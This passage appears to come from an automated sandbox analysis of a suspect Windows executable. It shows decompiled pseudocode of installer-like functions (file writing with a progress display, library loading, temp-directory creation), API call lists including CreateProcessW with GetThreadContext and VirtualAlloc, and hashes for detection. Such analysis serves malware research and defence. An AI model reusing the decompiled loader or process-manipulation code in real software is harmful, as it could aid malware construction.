								if(E00403066(0x414b80, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414b80, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E00403066(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b4e4 =  *0x40b4e4 & 0x00000000;
					 *0x40b4e0 =  *0x40b4e0 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40afc8 = 8;
					 *0x414b70 = 0x40cb68;
					 *0x414b6c = 0x40cb68;
					 *0x414b68 = 0x414b68;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E00403066(0x414b80, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40afb8 = 0x414b80;
						 *0x40afbc = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40afc0 = _t100;
							 *0x40afc4 = _v12;
							_t79 = E00405D23(0x40afb8);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40afc0; // 0x41a90c
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ec14 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404CC9(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40afc0; // 0x41a90c
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}



























                                      0x00402e4c
                                      0x00402e50
                                      0x00402e53
                                      0x00402e58
                                      0x00402e5a
                                      0x00402e5a
                                      0x00402e61
                                      0x00402e65
                                      0x00402e6a
                                      0x00402e6c
                                      0x00402e6c
                                      0x00402e73
                                      0x00402e78
                                      0x00402e7a
                                      0x00402e83
                                      0x00402e83
                                      0x00402e8e
                                      0x00402e95
                                      0x00403011
                                      0x00403011
                                      0x00000000
                                      0x00402e9b
                                      0x00402e9f
                                      0x00402ffc
                                      0x00403051
                                      0x00403016
                                      0x0040301c
                                      0x0040301e
                                      0x0040301e
                                      0x0040302f
                                      0x00000000
                                      0x00403031
                                      0x00403044
                                      0x00402ff6
                                      0x00402ff6
                                      0x00403013
                                      0x00403013
                                      0x00000000
                                      0x0040304b
                                      0x0040304b
                                      0x0040304e
                                      0x00000000
                                      0x0040304e
                                      0x00403044
                                      0x0040302f
                                      0x0040305c
                                      0x00000000
                                      0x0040305c
                                      0x00403001
                                      0x00403003
                                      0x00403003
                                      0x0040300f
                                      0x00403059
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040300f
                                      0x00402eab
                                      0x00402ead
                                      0x00402eb4
                                      0x00402ebb
                                      0x00402ebb
                                      0x00402ec2
                                      0x00402eca
                                      0x00402ed4
                                      0x00402ed9
                                      0x00402ee1
                                      0x00402eeb
                                      0x00402eee
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402ef4
                                      0x00402ef4
                                      0x00402ef4
                                      0x00402efc
                                      0x00402efe
                                      0x00402efe
                                      0x00402f0f
                                      0x00000000
                                      0x00000000
                                      0x00402f15
                                      0x00402f18
                                      0x00402f1e
                                      0x00402f24
                                      0x00402f24
                                      0x00402f2f
                                      0x00402f35
                                      0x00402f3a
                                      0x00402f41
                                      0x00402f44
                                      0x00000000
                                      0x00000000
                                      0x00402f4a
                                      0x00402f50
                                      0x00402f52
                                      0x00402f5b
                                      0x00402f5d
                                      0x00402f8b
                                      0x00402f91
                                      0x00402f9a
                                      0x00402f9f
                                      0x00402f9f
                                      0x00402fa6
                                      0x00402fea
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402fa8
                                      0x00402fab
                                      0x00402fcd
                                      0x00402fd2
                                      0x00402fd5
                                      0x00402fd8
                                      0x00402fdb
                                      0x00402fdf
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402fe5
                                      0x00402fb9
                                      0x00402fc1
                                      0x00000000
                                      0x00402fc8
                                      0x00402fc8
                                      0x00000000
                                      0x00402fc8
                                      0x00402fc1
                                      0x00402fa6
                                      0x00402ff2
                                      0x00000000
                                      0x00402ff2
                                      0x00000000
                                      0x00402ef4

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402EAB
                                      • GetTickCount.KERNEL32 ref: 00402F52
                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F7B
                                      • wsprintfA.USER32 ref: 00402F8B
                                      • WriteFile.KERNELBASE(00000000,00000000,0041A90C,7FFFFFFF,00000000), ref: 00402FB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CountTick$FileWritewsprintf
                                      • String ID: ... %d%%
                                      • API String ID: 4209647438-2449383134
                                      • Opcode ID: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                      • Instruction ID: 9e0124e4ae7d277b0b54c9942477664c6d45ab1b3c5c68ad5b6cbbf63d84754e
                                      • Opcode Fuzzy Hash: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                                      • Instruction Fuzzy Hash: A5619E7180120ADBDF10DF65DA48A9F7BB8BB44365F10413BE910B72C4C778DA51DBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 10022411, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 10022555
                                      • GetThreadContext.KERNELBASE(?,00010007), ref: 10022578
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ContextCreateProcessThread
                                      • String ID: D
                                      • API String ID: 2843130473-2746444292
                                      • Opcode ID: e1be512909fef20876ee7148e8c32219c4f72d8caab3526ec6cb2b082375e213
                                      • Instruction ID: 93cbd1c46eee3b4b9eebd203cd855ca6147035ffda57593b3b61aa9b70f15f3a
                                      • Opcode Fuzzy Hash: e1be512909fef20876ee7148e8c32219c4f72d8caab3526ec6cb2b082375e213
                                      • Instruction Fuzzy Hash: 8DA1E275E00209EFDB50DFA4D985BEEBBB9EF08344F6040A5E915EB250E770AA81DF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 57%
                                      			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x42ec18");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x42ebe8 =  *0x42ebe8 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404CC9(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x42f000, 0x40af78, "��B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                      0x00401f51
                                      0x00401f51
                                      0x00401f56
                                      0x00401f5d
                                      0x0040200b
                                      0x00402156
                                      0x00402156
                                      0x0040287d
                                      0x00402880
                                      0x0040288c
                                      0x0040288c
                                      0x00401f6c
                                      0x00401f76
                                      0x00401f79
                                      0x00401f88
                                      0x00401f8c
                                      0x00401f92
                                      0x00401f96
                                      0x00402004
                                      0x00000000
                                      0x00402004
                                      0x00401f98
                                      0x00401fa2
                                      0x00401fa6
                                      0x00401fea
                                      0x00401fa8
                                      0x00401fab
                                      0x00401fae
                                      0x00401fde
                                      0x00401fb0
                                      0x00401fb3
                                      0x00401fbc
                                      0x00401fbe
                                      0x00401fbe
                                      0x00401fbc
                                      0x00401fae
                                      0x00401ff2
                                      0x00401ff9
                                      0x00401ff9
                                      0x00000000
                                      0x00401ff2
                                      0x00401f7c
                                      0x00401f82
                                      0x00401f86
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                        • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041A90C,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                        • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041A90C,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                        • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041A90C,74E5EA30), ref: 00404D25
                                        • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                        • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                        • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                        • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                      • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                      • String ID: B
                                      • API String ID: 2987980305-3806887055
                                      • Opcode ID: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                      • Instruction ID: a273586f2596c922aa8c6de030caecb0164783ff06d74c4b05909b62d3698487
                                      • Opcode Fuzzy Hash: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                      • Instruction Fuzzy Hash: AA11EB72908215E7CF107FA5CD89EAE75B06B40359F20423BF611B62E0C77D4941D65E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E004054B2(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405449(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                      0x004015b3
                                      0x004015ba
                                      0x004015bd
                                      0x004015c2
                                      0x004015c6
                                      0x004015c8
                                      0x004015d0
                                      0x004015d6
                                      0x004015d8
                                      0x004015db
                                      0x004015e3
                                      0x004015f0
                                      0x004015fd
                                      0x004015fd
                                      0x004015f2
                                      0x004015f3
                                      0x004015fb
                                      0x00000000
                                      0x00000000
                                      0x004015fb
                                      0x004015f0
                                      0x00401600
                                      0x00401603
                                      0x00401605
                                      0x00401606
                                      0x004015c8
                                      0x0040160d
                                      0x0040162d
                                      0x00402156
                                      0x0040160f
                                      0x00401611
                                      0x0040161c
                                      0x00401622
                                      0x00401622
                                      0x00402880
                                      0x0040288c

                                      APIs
                                        • Part of subcall function 004054B2: CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 004054C0
                                        • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054C5
                                        • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054D4
                                      • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                      • String ID: C:\Users\user\AppData\Local\Temp
                                      • API String ID: 3751793516-501415292
                                      • Opcode ID: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                      • Instruction ID: 0fc8515a6fa1eb0c4cba02d173a6c2760af3d5d18bb88fe9e963a679bbf3bb3f
                                      • Opcode Fuzzy Hash: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                      • Instruction Fuzzy Hash: 98012631908140ABDB117FB62C44EBF2BB0EE56365728063FF491B22E2C23C4842D62E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405631, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00405631(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                      0x00405635
                                      0x0040563b
                                      0x0040563c
                                      0x0040563c
                                      0x0040563d
                                      0x00405644
                                      0x0040564e
                                      0x0040565b
                                      0x0040565e
                                      0x00405666
                                      0x00000000
                                      0x00000000
                                      0x0040566a
                                      0x00000000
                                      0x00000000
                                      0x0040566c
                                      0x00000000
                                      0x0040566c
                                      0x00000000

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00405644
                                      • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 0040565E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                      • API String ID: 1716503409-3023057193
                                      • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                      • Instruction ID: 4df4b8b99f59c83ab7109897de74f33533764e09c55b4925cc875bb6e1137cb6
                                      • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                      • Instruction Fuzzy Hash: 20F020323082087BEB104E19EC04F9B7FA9DF91760F14C02BFA48AA1C0C2B1994887A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 100213E8, Relevance: 7.7, APIs: 5, Instructions: 187fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 10021D6A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 738ec3acab21ef3c714b51d36d3b7c70e38e0a8d21abb50b91232a96a65bddd9
                                      • Instruction ID: 973ef1f3de952ea3ca1aa1dd87104c624138c88802d8a93105d5aa9987b02891
                                      • Opcode Fuzzy Hash: 738ec3acab21ef3c714b51d36d3b7c70e38e0a8d21abb50b91232a96a65bddd9
                                      • Instruction Fuzzy Hash: D3611739E50248EADB60CFE4E852BEDB7B6EF48710F60441AE518EB2A0E7711A41DB45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004030AF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 84%
                                      			E004030AF(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405B89(_t6);
				_t2 = E0040548B(_t6);
				if(_t2 != 0) {
					E0040541E(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E00405631("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                      0x004030b0
                                      0x004030b6
                                      0x004030bc
                                      0x004030c3
                                      0x004030c8
                                      0x004030d0
                                      0x004030dc
                                      0x004030e2
                                      0x004030c6
                                      0x004030c6
                                      0x004030c6

                                      APIs
                                        • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                        • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                        • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                        • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                      • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 004030D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Char$Next$CreateDirectoryPrev
                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 4115351271-1075807775
                                      • Opcode ID: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                      • Instruction ID: aa9e03880385e1d2cf47b50332cae3b8ca0df9fc70cebf3d54c0219f352de5d1
                                      • Opcode Fuzzy Hash: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                      • Instruction Fuzzy Hash: 50D0C911517D3029CA51332A3D06FEF191C8F4776AFA5507BF808B60C64B7C2A8349EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000CA10, Relevance: 3.2, APIs: 2, Instructions: 180memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000,11E1A300,00003000,00000004), ref: 1000CA2B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 2aa7d7e5d320f4a0cf1cacce7f07d352a3b7a33f38796e28da7bb157149135ec
                                      • Instruction ID: 35e18b2fd3fe9979c14f84380769d6918174682e04fc1f73b309c7ecafc9c62e
                                      • Opcode Fuzzy Hash: 2aa7d7e5d320f4a0cf1cacce7f07d352a3b7a33f38796e28da7bb157149135ec
                                      • Instruction Fuzzy Hash: D081EF1400DAF44BF306873E6CE13603FB06E6790172A498AD5FDE6AA7EE644346DF61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 69%
                                      			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42eb90; // 0x72145c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e34c =  *0x42e34c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e34c, 0x7530,  *0x42e334), 0);
					}
				}
				return 0;
			}












                                      0x0040138a
                                      0x004013fa
                                      0x00401392
                                      0x0040139b
                                      0x004013a0
                                      0x00000000
                                      0x00000000
                                      0x004013a2
                                      0x004013a3
                                      0x004013ad
                                      0x00000000
                                      0x00401404
                                      0x004013b0
                                      0x004013b7
                                      0x004013bd
                                      0x004013be
                                      0x004013c0
                                      0x004013c2
                                      0x004013b9
                                      0x004013b9
                                      0x004013ba
                                      0x004013ba
                                      0x004013c9
                                      0x004013cb
                                      0x004013f4
                                      0x004013f4
                                      0x004013c9
                                      0x00000000

                                      APIs
                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
